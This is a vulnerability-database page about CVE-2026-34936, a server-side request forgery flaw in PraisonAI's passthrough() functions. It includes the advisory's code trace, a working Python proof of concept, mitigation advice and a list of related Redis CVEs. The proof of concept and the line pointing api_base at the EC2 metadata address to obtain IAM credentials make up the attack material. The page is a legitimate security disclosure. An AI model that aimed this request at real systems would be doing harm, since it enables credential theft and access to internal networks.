Redis
CVE-2026-34936
HIGH
Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.
Details
passthrough.py:92 (source) -> passthrough.py:109 (fallback trigger) -> passthrough.py:110 (sink)
# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):
# fallback trigger -- AttributeError from unrecognised provider enters fallback
except AttributeError:
url = f"{api_base or 'https://api.openai.com'}{endpoint}"
# sink -- no validation before request
response = client.request(method, url=url, ...)PoC
# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm
sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route
from praisonai.capabilities.passthrough import passthrough
result = passthrough(
endpoint="/ssrf-test",
api_base="http://127.0.0.1:8888",
method="GET",
custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentialsImpact
On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with AUTH_ENABLED = False by default, making this reachable over the network without credentials.
AnalysisAI
Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. With default AUTH_ENABLED=False configuration, this is remotely exploitable to retrieve EC2 IAM credent
Technical ContextAI
This is a classic Server-Side Request Forgery vulnerability (CWE-918) in the PraisonAI Python package's HTTP passthrough capability. The passthrough.py module implements a fallback mechanism for LLM provider routing: when litellm raises AttributeError for unrecognized providers, the code enters an exception handler that concatenates the caller-supplied api_base parameter with an endpoint path and passes it directly to httpx.Client.request() without any validation. The vulnerable code path is: passthrough.py:92 accepts api_base from caller, line 109 catches AttributeError and constructs the URL via string concatenation (url = f"{api_base or 'https://api.openai.com'}{endpoint}"), and line 110 executes the HTTP request with no scheme validation, IP address filtering, or domain allowlisting. The httpx library faithfully executes requests to any reachable destination including RFC 1918 private addresses (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), localhost (127.0.0.1), and link-local addresses (169.254.0.0/16). This architectural flaw is compounded by PraisonAI's Flask API server deploying with AUTH_ENABLED=False by default, removing the low-privilege authentication barrier indicated in the CVSS vector and effectively making this network-accessible without credentials in default configurations.
RemediationAI
Users should immediately review the official GitHub Security Advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv for vendor-provided remediation guidance and patch availability. No vendor-released patch version is independently confirmed from the available data at time of analysis. As interim mitigations, organizations should enable authentication by setting AUTH_ENABLED=True in the Flask API server configuration to enforce the low-privilege requirement indicated in the CVSS vector, implement network-layer controls to block outbound requests from PraisonAI servers to RFC 1918 private address ranges and link-local addresses (169.254.0.0/16), upgrade EC2 instances to IMDSv2 which requires PUT requests with token headers that cannot be exploited via simple GET-based SSRF, and if possible avoid using the passthrough() and apassthrough() functions with untrusted input until a patched version is released. Network egress filtering should deny access to internal service ports (6379 for Redis, 9200 for Elasticsearch, 6443/8443 for Kubernetes) from the PraisonAI application tier. Consider implementing application-layer allowlists that restrict api_base parameters to explicitly approved external API domains if passthrough functionality is required for legitimate use cases.
LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild i
UAF in Redis 8.2.1 via crafted Lua scripts by authenticated users. EPSS 12.4%. Patch available.
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific
Memory Corruption was discovered in the cmsgpack library in the Lua subsystem in Redis before 3.2.12, 4.x before 4.0.10,
Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user
Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command.
A buffer overflow in Redis 3.2.x prior to 3.2.4 causes arbitrary code execution when a crafted command is sent. Rated cr
Code injection in OneUptime monitoring via custom JS monitor using vm module. PoC and patch available.
In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis,may be vulnerab
An issue was found in Apache Airflow versions 1.10.10 and below. Rated critical severity (CVSS 9.8), this vulnerability
An Integer Overflow issue was discovered in the struct library in the Lua subsystem in Redis before 3.2.12, 4.x before 4
goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.v
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-x6m9-gxvr-7jpv